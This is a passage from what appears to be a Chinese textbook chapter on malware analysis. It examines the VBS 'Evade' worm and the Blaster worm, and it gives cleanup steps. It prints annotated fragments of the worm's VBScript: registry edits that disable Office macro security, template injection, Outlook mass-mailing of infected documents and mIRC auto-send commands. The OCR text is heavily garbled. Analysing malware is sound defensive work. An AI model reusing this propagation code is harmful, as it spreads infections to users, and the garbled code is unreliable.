这 些 宝贵 数据 留 下 副本 。 同 时 ,病毒 还 会 自动 通过 E-mail 到 处 发 送 用 户 的 Office 文档 , 汇 
露 用 户 的 数据 信息 ,造成 非常 重大 的 经 济 损失 或 其 他 不 良 影响 。 


该 病毒 用 到 了 几乎 现行 所 有 脚本 病毒 曾经 用 过 的 传播 方式 : 文件 感染 、E-mail 传播 、 
IRC 通道 传播 .各 种 点 对 点 共享 工具 传播 (KaZza、Morpheus、Grokster、Bearshare、 
Edonkey)。 同 时 ,也 采用 了 宏 病 毒 的 传播 方式 : 通过 模板 ,文档 文件 进行 感染 。 


6.3.2 病毒 感染 实例 
(1) 在 服务 器 上 安装 Windows 2000 Server, 注 意 不 要 安装 补丁 程序 ,以 模拟 实验 环境 


保证 病毒 可 以 入 侵 。 
(2) 在 Windows 2000 Server 服务 器 上 单 击 带 有 VBS 病毒 的 邮件 附件 。 病 毒 一 般 会 生 


成 以 下 标题 的 信件 。 


"Here is that file" 
"Inportant file" 
"The file" 

"Word file" 

"The file you wanted" 
"Here is the file" 


邮件 内 容 为 : 

"The file I am sending you is confidential as well as important; 

so don't let anyone else have a copy. " 

邮件 的 附件 是 被 感染 的 当前 病毒 文档 , 当 打 开 该 病毒 文档 时 ,病毒 便 开 始 运行 。 

(3) 在 浏览 一 个 信任 的 网 站 时 ,会 发 现 打 开 每 个 文件 夹 的 速度 非常 慢 ,这 说 明 系 统 已 经 
感染 病毒 。 


6.3.3 特征 代码 分 析 


1. 该 病毒 运行 的 大 致 流程 

该 病毒 运行 流程 并 不 复杂 ,可 以 简单 描述 如 下 : 

O 复制 病毒 文件 到 用 户 Windows 目录 和 系统 目录 。 

© 修改 注册 表 ,改变 Excel 的 安全 级 别 。 

© 写 入 病毒 代码 到 Evade. gif ,并 将 Evade. gif 导入 到 Personal. xls 文件 。 

@ 修改 注册 表 ,改变 Word 的 安全 级 别 。 

© 写 人 病毒 代码 到 Evade. jpg ,并 将 该 文件 导入 到 Word 通用 模板 。 

© 搜索 整个 磁盘 ,在 每 个 盘 符 (C 盘 除 外 ) 根 目录 下 创建 病毒 副本 Passwords. vbs, 

D 感染 硬盘 上 所 有 . vbs、. vbe 文件 。 

@ 对 指定 9 个 目录 进行 再 次 搜索 ,用 病毒 文件 覆盖 满足 条 件 (指定 13 种 后 级 ) 的 文件 。 

@ 如 存在 Mirc, 修改 Script. ini. 使 其 可 以 通过 Mirc 聊天 通道 发 送 病毒 文件 
Conversation. vbe。 

D 修改 注册 表 ,标明 病毒 作者 信息 及 版 本 。 

2. 下 面 针对 于 以 上 具体 流程 结合 具体 代码 进行 分 析 

(1) 主体 病毒 代码 

(D 该 病毒 的 解密 函数 代码 如 下 : 
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Function EO(E1) 

For E2 = 1 ToLen(El)E3 = Mid(El,E2,1) 

If Not Asc(E3) Mod 2 = 0 Then 'E3 的 ASCII 码 是 否 为 奇数 
E3 = Chr(Asc(E3) - 1) ' 是 
Else 
E3 = Chr(Asc(E3) + 1) ' 不 是 

EndIf 

E0 = E0&E3 ' 整 合 已 经 处 理 的 字符 

Next' 继 续 , 直到 整个 字符 串 处 理 完毕 End Function 


这 个 函数 具有 的 作用 : 对 于 给 出 的 字符 串 El 中 的 每 个 字符 ,如 果 该 字符 的 ASCI 码 X 


为 奇数 ,那么 用 ASCII 码 值 为 X 一 1 的 字符 代替 这 个 字符 ,否则 ,用 ASCII 码 值 为 X 十 1 的 
字符 代替 这 个 字符 。 也 就 是 说 一 个 字符 要 么 用 它 前 面 的 字符 代替 ,要 么 用 它 后 面 的 字符 代 


B. 


例如 ,F 的 ASCI 码 为 70, 那 么 F 将 被 ASCI 码 为 71 的 字符 G 代替 ,G 将 被 FF 代替。 
那么 对 于 病毒 中 的 加 密 字符 串 Rbshquhof/GhmdRxrudlNckdbu , 解密 后 的 代码 就 是 


Scripting. FileSystemObject 。 


原 。 


同时 ,由 上 面 F 到 G 的 相互 转换 ,可 以 发 现 ,一 个 字符 经 过 该 函数 两 次 处 理 之 后 会 还 
其 实 , 这 个 函数 也 是 该 病毒 的 加 密 函 数 。 
© 病毒 对 Excel 做 修改 的 代码 分 析 如 下 : 


XlKey = "HKCU\Software\Microsoft\Office\" & Xl. Application. Version & "\Excel\Security") 
wsc.RegWrite XlKey & "Level",1,"REG DWORD"wsc.RegWrite XlKey & "AcessVBOM",1,"REG DWORD" ' 这 
里 是 写 入 注册 表 , 修改 Excel 的 安全 等 级 … 

Xl.Visible = False 

X1. WorkBooks. AddX1. ActiveWorkbook. VBProject. VBComponents. Import(fso.GetSpecialFolder(1) & " 
XEvade. gif") ' 导 入 Evade. gif 中 的 病毒 代码 

X1. ActiveWorkbook.SaveAs (Xl. Application. StartupPath & "\Personal. xls")' 将 Evade. gif 的 内 容 
保存 到 Personal.xls 文件 

Xl. Quit 


通过 上 面 这 段 程序 ,病毒 将 病毒 代码 写 入 到 了 Personal. xls, 这 样 以 后 打开 Excel 时 就 


会 自动 执行 另外 一 段 病 毒 代 码 。 这 段 病毒 代码 后 面 会 加 以 分 析 。 


© 病毒 对 Word 做 修改 的 代码 分 析 如 下 : 


WdKey = "HKCUMSoftwareMMicrosoftVOfficeV" & Wd. Application. Version & "\Word\Secutiry\"wsc. 
RegWrite WdKey & "Level"),1,"REG DWORD") 
wsc.RegWrite WdKey & "AccessVBOM",1," REG DWORD") 
' 这 里 是 写 人 注册 表 , 修改 Word 的 安全 等 级 Wd. Options. VirusProtection = False ' 关 闭 病 毒 保 护 
功能 
Wd. Options. SaveNormalPrompt = False ' 自 动 保存 模板 ,不 给 用 户 提示 

Wd. Options. ConfirmConversions = False ' 不 给 出 确认 信息 … 

If Wd. NormalTemplate. VBProject. VBComponents. Item( "Evade" ) . Name <> "Evade" ) Then 

Wd. NormalTemplate. VBProject. VBComponents. Import SysDir & "VEvade. jpg") 

Wd. Normal Template. VBProject. VBComponents.Item("Evade")).Name = "Evade") 

' 将 Evade. jpg 的 内 容 保存 到 Word 通用 模板 

End If 


通过 上 面 这 段 程序 ,病毒 将 病毒 代码 写 人 到 了 Word 通用 模板 ,这 样 以 后 打开 Word 时 
也 会 自动 执行 另外 一 段 病毒 代码 。 这 段 病毒 代码 后 面 也 会 加 以 分 析 。 

@ 病毒 在 往 evade. gif. evade. jpg 文件 中 写 人 的 并 不 是 直接 的 VBS 代码 ,这 段 VBS 代 
码 写 人 时 是 通过 一 段 转换 代码 处 理 过 的 ,该 段 代 码 将 病毒 体 的 字符 串 转换 为 每 个 字符 
ASCI 码 串 (其 中 ASCI 码 以 十 六 进 制 表 示 )。 其 具体 代码 分 析 如 下 : 


For i = 1 To Len(ScriptRead) 

Tz = Mid(ScriptRead, i,1) 

Tz = Hex(Asc(Tz)) 

' 取 字符 的 ASCII 码 ,并 将 其 转化 为 十 六 进 制 串 

If Len(Tz) = 1 Then 

"如 果 该 字符 的 RSCII 码 不 大 于 F, 辟 如 回 车 换行 D, A 

Tz = E0("1")&Tz 

' 在 字符 前 面 加 0, 璧 如 ,将 D 转 换 为 0D, 补 足 两 个 字符 ,便于 后 面 逆向 处 理 

End If 

Gz = Gz + Tz ' 整 合 处 理 过 的 字符 

If Len(Gz) = 110 Then 

"如 果 处 理 的 字符 串 达 到 110 个 字符 (其 实 是 55 个 字符 ,因为 一 个 字符 转换 成 十 六 进 制 ASCII 码 后 两 
位 ) 

EM.WriteLine "Tz = Tz + """ + Gz + Chr(34) ' 将 处 理 过 的 110 个 字符 写 入 文件 ,实际 写 到 文件 的 
是 字符 串 Tz= Tz + "处 理 过 的 110 个 字符 ” 

Gz = EO("") ' 将 Gz 清空 ,以 便 继续 处 理 

EndIf 

If Len(ScriptRead)- i = 0 Then ' 如 果 所 有 字符 已 经 处 理 完 

EM.WriteLine "Tz = Tz + """ + Gz + Chr(34) ' 将 剩余 处 理 过 的 字符 串 写 人 文件 
Gz = EO("") ' 将 Gz 清空 

End If 

Next 


C) 叛逃 者 病毒 会 对 整个 磁盘 进行 搜索 ,寻找 满足 条 件 的 文件 ,其 搜索 代码 和 爱 虫 病毒 
的 搜索 代码 基本 上 是 一 模 一 样 ,同样 搜索 到 每 个 盘 符 后 , 先 检查 该 盘 符 是 否 是 软盘 或 硬盘 ， 
如 果 是 则 对 其 进行 递归 、 搜 索 每 个 文件 夹 ,查找 每 个 满足 条 件 的 文件 。 不 过 这 段 搜索 代码 在 
找到 C 盘 后 ,会 在 磁盘 (C 盘 除 外 ) 根 目录 下 创建 一 个 名 为 passwords. vbs 的 病毒 副本 ,这 个 
文件 名 诱惑 用 户 双 击 该 文件 ,执行 病毒 代码 。 相 关 代码 如 下 : 

If UCase(NetDrive.Path) <> "C: " Then 


fso. CopyFile WScript. ScriptFullName, NetDrive.Path & "\Passwords. vbs") 
End If 


病毒 为 了 避免 反复 感染 同一 个 文件 ,会 先 查 看 该 文件 中 是 否 含有 病毒 标记 " ' VBS/ 
Evade by Zed /[rRIG", 如 果 存在 则 不 对 其 进行 感染 。 这 里 病毒 并 没有 对 目标 文件 进行 覆 
盖 , 而 是 将 病毒 代码 写 在 了 原来 文件 的 未 尾 ,并 且 这 里 写 入 的 也 是 转换 成 十 六 进 制 ASCII 
码 后 的 病毒 代码 , 紧 接 其 后 病毒 写 人 了 道 向 转换 代码 和 调用 执行 语句 。 

另外 ,病毒 还 会 对 指定 9 个 目录 ， 

C: KazaaMy Shared Folder 


C: My Downloads 
C: ProgramFiles % KazaaMy Shared Folder 
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: ProgramFiles % KaZaA LiteMy Shared Folder 
: ProgranFiles & BearshareShared 

: ProgramFiles $ Edonkey2000 

: ProgramFiles % MorpheusMy Shared Folder 

: ProgramFiles % GroksterMy Gorkster 

: ProgramFiles % ICQShared Files 


C 
C 
C 
C 
C 
C 


进行 搜索 ,并 对 . mp3、. mp2,. avi,. mpg.. mpeg.. mpe,. mov,. pdf,. doc,. xls,. mdb, 
-ppt.. pps 等 13 种 数据 文件 ,进行 覆盖 。 先 创建 一 个 以 原文 件 名 为 前 组 ,vbs 2S 5 RII PER 
文件 副本 ; 然后 ,删除 原来 的 文件 。 这样, 用 户 在 看 到 这 些 文件 后 ,会 以 为 这 些 文件 是 用 户 
原来 的 文件 而 去 双击 它 。 这 样 病毒 就 得 到 了 控制 权 。 以 上 9 个 目录 是 网 上 进行 文件 共享 时 
的 默认 目录 ,如 果 病 毒 覆盖 了 这 些 病 毒 中 的 文件 ,其 他 网 络 用 户 就 会 下 载 这 些 文 件 , 这 样 病 
毒 就 得 以 广泛 传播 。 

© 叛逃 者 病毒 可 以 利用 Mirc 聊天 通道 进行 传播 ,并 修改 Script. ini 文件 ,使 得 Mire 会 
自动 向 通道 中 的 其 他 好 友 发 送 病毒 文件 。 病 毒 依次 查找 如 下 4 个 目录 ; 

C: \Mirc 

C: \Mirc32 

\Mirc 

\Mirc32 

如 果 发 现 这 些 目录 , 则 在 该 目录 中 添加 或 修改 文件 Script. ini, 并 在 其 中 写 和 人 一些 控制 
指令 。 这 些 指令 可 以 自动 往 通 道中 的 其 他 用 户 发 送 病毒 文件 。 添 加 的 指令 如 下 : 

; Mirc Scripting utility - do not modify 

[Script] 

n5 = no 1: Join: #; { 

n6 =/if ($nick= = $ me) {halt} 

n7 = /msg $ nick Remember this funny conversation I had on IRC? 

n8 = /dcc send -c $ nick WinDir \Conversation. vbe 

n=} 

(2) 两 个 "图片 "文件 的 代码 分 析 

(D evade. gif 文件 

该 文件 是 要 被 导入 到 personal. xls 文件 中 的 病毒 副本 。 该 病毒 副本 首先 修改 Excel 安 
全 等 级 ,并 建立 一 个 Auto_Open 函数 ,该 函数 只 有 一 条 调用 OsaEvade 过 程 的 语句 。 
OsaEvade 是 病毒 发 作 部 分 。Auto_Open 函数 在 用 户 打 开 文 档 时 会 自动 执行 的 。 这 样 ,每 
次 打开 Excel 文档 时 ,病毒 就 会 获得 控制 权 。 这 也 是 宏 病 毒 常用 的 手段 。 同 时 ,病毒 还 做 了 
一 些 基 本 的 隐蔽 措施 : 

Application. ScreenUpdating = False ' 不 让 屏幕 更 新 ,让 病毒 执行 时 不 影响 计算 机 速度 

Application.DisplayAlerts = False ' 不 让 Excel 弹出 报警 信息 

Application. EnableCancelKey = xlDisabled ' 使 不 可 以 通过 ESC 键 取 消 正在 执行 的 宏 病 毒 

Application.DisplayStatusBar = False ' 不 显示 状态 栏 ,以 免 暴 露 病毒 的 运行 情况 

病毒 还 会 检查 相应 目录 下 是 否 存在 personal. xls 和 Winstart. vbs ,如 果 不 存在 ,马上 以 
evade. g 计 文件 为 样本 创建 这 2 个 文件 。 在 这 个 文件 中 最 重要 的 一 个 步骤 就 是 从 当前 
Outlook 中 的 电话 短 中 找到 E-mail 地 址 ,并 发 送 带 毒 Office 文档 。 部 分 代码 分 析 如 下 : 


EmailKey = "HKEY CURRENT USER\Software\Zed/[rR1f]\VBS/Evade\RecordContacts\" 

ReadlfSent = wsc.RegRead(EmailKey & ContactSwitch. AddressEntries(UserGroup)) 

"从 注册 表 中 读 取信 息 ,看 是 否 已 向 该 邮件 地 址 发 送 过 

If ReadIfSent <> "File Sent" Then ' 如 果 没 有 发 送 过 , 则 继续 

Set OutlookEmail = OutlookApp.CreateItem(0) 

OutlookEmail.Recipients. Add ContactSwitch. AddressEntries(UserGroup) ' 收 件 人 
OutlookEmail.Subject = L6 ' 邮 件 标题 ,该 标题 是 从 7 个 标题 中 随机 选取 的 

OutlookEmail.Body = "The file I am sending you is confidential as well as important; so don't 
let anyone else have a copy." ' 邮 件 内 容 

OutlookEmail. Attachments. Add ActiveWorkbook. FullName ' 邮 件 附 件 ,这 里 贴 上 的 是 染 毒 的 Office 文 
档 ,因此 会 造成 文件 泄露 

OutlookEmail.Importance = 2 ' 文 件 重要 等 级 

OutlookEmail.DeleteAfterSubmit = True ' 发 送 后 自我 删除 

OutlookEmail.Send ' 发 送 邮 件 

wsc. RegWrite EmailKey & ContactSwitch. AddressEntries (UserGroup), File Sent" ' 在 注册 表 中 记 
录 , 以 免 重 复发 送 

End If 


另外 该 文件 中 含有 一 个 非常 重要 的 转换 函数 ,前 面 讲 过 主 病毒 文件 被 写 人 到 这 个 文件 
时 是 经 过 ASCII 码 转 换 的 。 要 让 这 段 代 码 写 入 到 Winstart. vbs 中 能 执行 ,这 里 就 需要 对 其 
做 恢复 转换 。 这 个 函数 如 下 : 

Function CM(CN)For GC = 1 To Len(CN) Step 2 ' 以 两 个 字符 为 单位 ,因为 一 个 字 
符 转换 成 十 进 制 ASCI 码 后 为 两 个 字符 CM = CM & Chr" &h" & Mid(CN,GC,2)) t 
如 A 的 ASCII 码 为 65, 转 换 为 十 六 进 制 为 41, 这 里 就 是 将 41 转换 成 字符 ANextEnd Function; 

Q) evade. jpg 文件 

这 个 文件 开始 是 用 于 导入 到 Word 通用 模板 的 。 该 病毒 副本 同样 修改 了 Word 安全 等 
级 ,并 创建 了 AutoClose, AutoOpen, ViewVBCode, Evade 过 程 。 其 中 ,在 Evade 过 程 中 是 
病毒 表现 代码 ; 前 两 个 在 Word 文件 关闭 .打开 时 会 自动 执行 ,并 且 这 两 个 过 程 均 调 用 了 
Evade 过程 ; 这 里 ViewVBCode 过 程 中 没有 任何 语句 ,这 样 , 当 用 户 按 Alt 十 F8 键 后 就 不 会 
调 出 安 编 辑 窗口 ,而 是 不 做 任何 动作 ,这 从 某 种 程度 上 保护 了 病毒 程序 不 被 他 人 分 析 。 

另外 ,和 evade. gif 文件 一 样 ,病毒 也 做 了 一 些 基本 的 隐蔽 措施 : 

Application.DisplayStatusBar = 0 ' 不 显示 状态 栏 ,以 免 暴露 病毒 的 运行 情况 

Application. ScreenUpdating = 0 ' 不 让 屏幕 更 新 ,让 病毒 执行 时 不 影响 计算 机 速度 

Application. EnableCancelKey = wdCancelDisabled ' 使 不 可 以 通过 ESC 键 取消 正在 执行 的 宏 病毒 

Application.DisplayAlerts = wdAlertsNone ' 不 让 Excel 弹出 报警 信息 

CommandBars("Tools").Controls("Macro").Enabled = 0 ' 屏 蔽 工具 菜单 中 的 “ 宏 ” 

CommandBars("Macro").Controls("Security...").Enabled = 0 ' 屏 蔽 宏 菜单 的 “安全 性 …” 

CommandBars("Macro").Controls("Macros...").Enabled = 0 ' 屏 蔽 宏 菜单 的 “ 宏 …” 

CommandBars("Tools").Controls("Customize. ..").Enabled = 0 ' 屏 项 工具 菜单 的 “ 自 定义 …” 

CommandBars("View").Controls("Toolbars").Enabled = 0 ' 屏 项 视图 宏 菜 单 的 “工具 栏 ” 

CommandBars(" format").Controls("Object...").Enabled = 0 ' 屏 项 格式 菜单 的 “对象” 

这 样 ,病毒 通过 这 些 设置 就 可 以 防止 用 户 通过 对 Word 进行 一 些 设置 查看 和 解除 宏 病 
毒 代 码 。 

另外 ,其 他 部 分 和 evade. gif 文件 功能 基本 上 一 样 。 该 文件 同样 含有 E-mail 发 送 代码 
和 恢复 转换 函数 ,并 且 原 理 一 模 一 样 ,这 里 不 在 具体 叙述 。 
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6.3.4 病毒 清除 


由 于 叛逃 者 病毒 不 仅 感染 了 VBS 脚本 文件 .覆盖 了 其 他 类 型 的 文件 ,同时 也 感染 了 
Word、Excel, 因 此 该 病毒 在 解除 过 程 中 不 得 运行 脚本 文件 ,也 不 得 对 Word, Excel 进行 
操作 。 

下 面 简要 谈 一 下 这 个 病毒 的 解除 思路 : 

(1) 按照 前 面 所 提 到 的 部 分 删除 或 改 回 被 修改 过 的 注册 表 键 值 。 

(2) 删除 前 面 提 到 的 9 个 目录 中 的 所 有 被 感染 文件 evade. gif evade. jpg, Personal. xls. 
\Passwords. vbs。 还 有 Windows 和 系统 目录 下 的 5 个 vbs、1l 个 vbe 文 件 。 

G) 查找 被 感染 的 vbe, vbs 文件 ,编辑 并 删除 文件 后 面 的 病毒 代码 。 

(4) 对 Excel 和 Word 进行 解毒 ,并 且 还 要 杀 除 已 被 感染 文档 中 的 病毒 。 

(5) 如 果 有 Mirc, 还 需 修改 Script. ini 文件 ,删除 后 来 添加 的 几 个 命令 行 。 

上 面 有 些 步 又 比较 复杂 ,建议 一 般 用 户 采用 杀毒 软件 进行 杀毒 。 

通过 对 VBS 典型 病毒 “叛逃 者 ”进行 分 析 , 可 以 知道 网 络 病毒 中 VBScript 病毒 种 类 很 
多 ,但 这 些 VBS 病毒 在 传播 途径 .感染 机 制 ,破坏 方式 等 方面 都 有 一 些 共 性 , 现 分 析 如 下 : 

(1) VBS 病毒 的 执行 环境 

顾名思义 ,VBS 病毒 是 用 VBScript 脚本 语言 编写 的 ,因而 , 它 的 执行 离 不 开 Windows 
Script Host(WSH , 它 使 得 用 户 可 以 在 基本 操作 系统 , 即 Windows 95 或 Windows NT 4.0 
上 运行 VBScript 和 JScript) 环 境 。 如 果 系 统 中 安装 了 IE5,IE5 会 默认 安装 WSH (可 以 在 
系统 中 禁止 该 功能 从 而 禁止 某 些 VBS 蠕虫 的 运行 )。 

还 有 的 VBS 病毒 是 通过 含有 宏 的 DOC 文档 创建 的 , 当 在 Word 中 打开 该 文档 时 ,其 中 
包含 的 宏 被 执行 ,并 创建 VBS 病毒 。 

(2) 传播 途径 及 感染 方式 

VBS 病毒 最 普遍 的 传播 途径 是 通过 Microsoft Outlook 发 送 邮件 。 它 利用 了 MAPI 的 
Sendmail 函数 来 向 Outlook 地 址 短 中 的 邮件 地 址 发 送 E-mail。 以 邮件 附件 .HTML 格式 邮 
件 正文 ,隐藏 在 HTML 格式 页 面 的 Script 程序 等 方式 。 

通过 IRC 客户 端 软件 mIRC 或 PIRCH 进行 传播 。 传 播 方式 主要 是 通过 修改 mIRC, 
PIRCH 安装 路 径 中 的 Script. ini 文件 ,使 得 被 感染 病毒 用 户 连接 到 IRC 通道 时 向 同一 通道 
中 的 其 他 用 户 发 送 VBS 病毒 。 

网 络 中 的 文件 感染 ,通常 情况 下 ,VBS 病毒 会 搜索 本 地 及 局 域 网 中 的 具有 特定 扩展 名 的 
文件 (如 . vbs,. vbe、.js、. css、.jse、 sct 等 ), 并 用 VBS 病毒 代码 覆盖 文件 达到 感染 的 目的 。 

VBS 病毒 在 本 地 硬盘 中 安装 病毒 副本 ,然后 修改 注册 表 中 某 些 注册 键 的 值 , 如 

HKEY LOCAL MACHINE\SOFTWARE\MICROSOFT\Windows\CURRENT VERSION\RUN 

HKEY LOCAL MACHINE\SOFTWARE\MICROSOFT\Windows\CURRENT VERSION\RUNSERVICE 

或 \Windows\ win. ini 的 run = 和 \Windows \system. ini 的 setup = 的 值 。 

这 样 做 ,目的 是 每 当 启 动 Windows 时 都 能 够 运行 该 病毒 。 

(3) VBS 病毒 的 危害 

V BS 病毒 的 危害 及 造成 的 损失 不 尽 相 同 ,但 总 体 来 说 可 以 归结 为 乱 发 邮件 、 履 盖 文 件 、 
删除 文件 及 目录 、 格 式 化 硬盘 .使 键盘 .鼠标 失效 等 形式 。 


6.4 冲击 波 病 毒 特征 分 析 


6.4.1 冲击 波 病毒 将 征 简 介 


冲击 波 病毒 利用 RPC 漏洞 进行 快速 传播 。 病 毒 程序 用 UPX 压缩 , 仅 有 6KB。 较 小 的 
体积 是 能 让 其 在 网 络 上 快速 传播 的 重要 原因 之 一 。 

冲击 波 病毒 攻击 的 端口 是 TCP135. TCP4444 和 UDP69 端口 。 该 病毒 的 攻击 目标 为 
Windows Update, 如 果 当 前 系统 时 间 月 份 大 于 8 月 ,或 日 期 大 于 15 号 ,该 病毒 会 对 
“Windows update. com” 网 站 实施 DoS 攻击 。 这 样 就 有 可 能 影响 用 户 正 常 使 用 Windows 
Update 修补 系统 。 对 于 拥有 局 域 网 的 企 事业 来 讲 , 该 病毒 的 直接 结果 是 引发 局 域 网 瘫痪 。 

CD 添加 如 下 注册 表 键 值 : "Windows auto update" — " msblast. exe" 在 HKEY_LOCAL 
- MACHINENSOFTW AREMMicrosoftV Windows Current Version Run 下 ,以 使 蠕虫 可 以 
开机 自动 运行 ; 

(2) 攻击 病毒 自我 生成 IP 地 址 ; 

(3) 攻击 RPC 服务 默认 端口 ,为 传播 自己 做 准备 ; 

(D 监听 UDP 69 端口 , 当 有 服务 请 求 , 就 发 送 Msblast. exe 文件 ; 

G) 发 送 命 令 到 远程 计算 机 (被 攻击 计算 机 ), 以 使 其 连接 被 感染 计算 机 (本 地 计算 机 ) 
下 载 并 运行 该 病毒 ; 

(6) 如 果 当 前 月 份 大 于 8 月 ,或 当前 日 期 大 于 15 号 ,对 "Windows update. com" 实 施 
DoS 攻击 ; 

(7) 该 蠕虫 包含 有 如 下 不 会 被 显示 的 字符 串 ， 


I just want to say LOVE YOU SAN! ! 
billy gates why do you make this possible ? Stop making money and fix your software! ! 


6.4.2 病毒 感染 实例 


CD 在 服务 器 上 安装 Windows 2000 Server ,注意 不 要 安装 补丁 程序 ,以 模拟 实验 环境 
保证 病毒 可 以 入 侵 。 

(2) 在 Windows 2000 Server 服务 器 上 单 击 带 有 冲击 波 病毒 的 邮件 附件 。 

(3) 系统 会 定时 重新 启动 或 提示 RPC 错误 ,许多 网 页 无 法 打开 。 


6.4.3 病毒 样本 反 汇 编 分析 


取 回 样本 后 查看 MSBlast. exe, 字 节 数 为 6176 字 节 。 利 用 Winhex 查看 MSBlast. exe 
十 六 进 制 ,发 现 十 六 进 制 中 包含 UPX 字符 ,从 经 验 可 以 断定 是 利用 UPX 压缩 ,但 还 是 利用 
Language 进行 识别 ,判定 的 确 为 UPX 加 壳 之 后 ,利用 UPXShell 将 MSBlast. exe 进行 脱 壳 
之 后 字 节 数 为 11 296 字 节 。 

利用 W32dsm 打开 已 脱 壳 的 MSBlast. exe, 可 以 从 中 分 析 病 毒 PE 文件 具体 信息 。 


E iL Aii MSBlast. exe 
Disassembly of File: msblast.exe * 反 汇 编 文 件 名 称 : msblast. exe 
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Code Offset = 00000400,Code Size = 00001458 * 代码 偏 移 量 : 00000400, 代码 大 小 = 00001458 
Data Offset = 00001A00,Data Size = 0000088C = 数据 偏 移 量 : 00001A00, 数据 大 小 = 0000088C 
Number of Objects = 0004 (dec), Imagebase = 00400000h 

< 对 象 共计 = 0004 (dec), 基 地 址 = 00400000h 


Object01: .text RVA: 00001000 Offset: 00000400 Size: 00001458 Flags: 60000020 

Object02: .bss RVA: 00003000 Offset: 00000000 Size: 00000000 Flags: C0000080 

Object03: .data RVA: 00004000 Offset: 00001A00 Size: 0000088C Flags: C0000040 

Object04: . idata RVA: 00005000 Offset: 00002400 Size: 000006C0 Flags: C0000060 

* Object01: .text 相对 虚拟 地 址 : 00001000 偏 移 量 : 00000400 大 小 : 00001458 标记 位 : 60000020 
* Object02: .bss 相对 虚拟 地 址 : 00003000 偏 移 量 : 00000000 大 小 : 00000000 标记 位 : C0000080 
* Object03: . data 相对 虚拟 地 址 : 00004000 偏 移 量 : 00001A00 大 小 : 0000088C 标记 位 : C0000040 
* Object04: . idata 相对 虚拟 地 址 : 00005000 偏 移 量 : 00002400 大 小 : 000006C0 标记 位 : C0000060 


* 文 中 含有 * 为 解释 部 分 仅 供 参 考 . 

可 以 从 以 上 的 数据 中 获取 病毒 在 内 存 中 执行 的 数据 ,该 病毒 BE 文件 共 分 为 4 个 区 块 ,分 别 为 text, 
bss .data ,idata. 脱 壳 后 的 病毒 的 入口 点 则 为 11CBh. 

MSBlast. exe 病毒 共 调用 5 个 DLL 模块 ,53 个 Win32 API 函数 .5 个 DLL 模块 分 别 为 KERNEL32. DLL, 
ADVAPI32.DLL,CRTDLL.DLL,WININET.DLL,WS2 32.DLL,53 个 Win32 API 函数 请 参照 以 下 反 汇 编 数 据 . 


十 十 十 二 十 十 十 十 十 十 十 十 十 十 二 十 十 十 IMPORTED FUNCTIONS 十 十 十 十 十 十 十 十 十 十 十 十 十 二 十 二 十 十 


Number of Imported Modules = 
Import Module 001: KERNEL32.DLL 
Import Module 002: ADVAPI32.DLL 
Import Module 003: CRTDLL. DLL 
Import Module 004: WININET. DLL 
Import Module 005: WS2 32.DLL 


5 (decimal) 


十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 二 二 十 IMPORT MODULE DETAILS 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 


Import Module 001 : KERNEL32. DLL 
Addr: 000053E8 hint(0000) Name: 
Addr: 000053F8 hint(0000) Name: 
Addr: 
Addr: 
Addr: 
Addr: 
Addr: 
Addr: 
Addr: 
Addr: 
Addr: 
Addr: 


0000541C hint(0000) Name: 


00005440 hint(0000) Name: 
00005458 hint(0000) Name: 
0000546C hint(0000) Name: 
0000547C hint(0000) Name: 
0000548C hint(0000) Name: 
00005498 hint(0000) Name: 
000054A8 hint(0000) Name: 
Addr: 000054B0 hint(0000) Name: 
Addr: 000054C4 hint(0000) Name: 
Import Module 002: ADVAPI32.DLL 
Addr: 000054D4 hint(0000) Name: 
Addr: 000054E4 hint(0000) Name: 
Addr: 000054F8 hint(0000) Name: 
Import Module 003: CRTDLL. DLL 
Addr: 0000550C hint(0000) Name: 
Addr: 0000551C hint(0000) Name: 
Addr: 00005524 hint(0000) Name: 
Addr: 0000552C hint(0000) Name: 
Addr: 00005538 hint(0000) Name: 
Addr: 00005540 hint(0000) Name: 


00005408 hint(0000) Name: 


00005430 hint(0000) Name: 


ExitProcess 
ExitThread 
GetCommandLineA 
GetDateFormatA 
GetLastError 
GetModuleFileNameA 
GetModuleHandleA 
CloseHandle 
GetTickCount 
RtlUnwind 
CreateMutexA 
Sleep 
TerminateThread 
CreateThread 


RegCloseKey 
RegCreateKeyExA 
RegSetValueExA 


. GetMainArgs 
atoi 

exit 

fclose 

fopen 

fread 


Addr: 00005548 hint(0000) Name: memcpy 
Addr: 00005554 hint(0000) Name: memset 
Addr: 00005560 hint(0000) Name: raise 
Addr: 00005568 hint(0000) Name: rand 
Addr: 00005570 hint(0000) Name: signal 
Addr: 0000557C hint(0000) Name: sprintf 
Addr: 00005588 hint(0000) Name: srand 
Addr: 00005590 hint(0000) Name: strchr 
Addr: 0000559C hint(0000) Name: strtok 
Import Module 004: WININET. DLL 
Addr: 000053CC hint(0000) Name: InternetGetConnectedState 
Import Module 005: WS2 32.DLL 
Addr: 000052C0 hint(0000) Name: htons 
Addr: 000052C8 hint(0000) Name: ioctlsocket 
Addr: 000052D8 hint(0000) Name: inet addr 
Addr: 000052E4 hint(0000) Name: inet ntoa 
Addr: 000052F0 hint(0000) Name: recvfrom 
Addr: 000052FC hint(0000) Name: select 
Addr: 00005308 hint(0000) Name: send 
Addr: 00005310 hint(0000) Name: sendto 
Addr: 0000531C hint(0000) Name: setsockopt 
Addr: 0000532C hint(0000) Name: socket 
Addr: 00005338 hint(0000) Name: gethostbyname 
Addr: 00005348 hint(0000) Name: bind 
Addr: 00005350 hint(0000) Name: gethostname 
Addr: 00005360 hint(0000) Nane: closesocket 
Addr: 00005370 hint(0000) Name: WSAStartup 
Addr: 00005380 hint(0000) Name: WSACleanup 
Addr: 00005390 hint(0000) Name: connect 
Addr: 0000539C hint(0000) Name: getpeername 
Addr: 000053AC hint(0000) Name: getsockname 
Addr: 000053BC hint(0000) Name: WSASocketA 
十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 二 十 EXPORTED FUNCTIONS 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 
Number of Exported Functions = 0000 (decimal) 


看 完 以 上 Win32 API 函数 ,可 以 明白 病毒 调用 哪些 API 函数 ,( 如 要 不 太 熟 API 函数 
可 以 参阅 MSDN 获取 更 详细 的 资料 )。 了 解 API 函数 针对 病毒 每 个 动作 就 会 非常 熟悉 。 
以 上 的 分 析 为 反 汇编 分 析 , 而 以 下 部 分 是 利用 Winhex 查看 病毒 十 六 进 制 。 


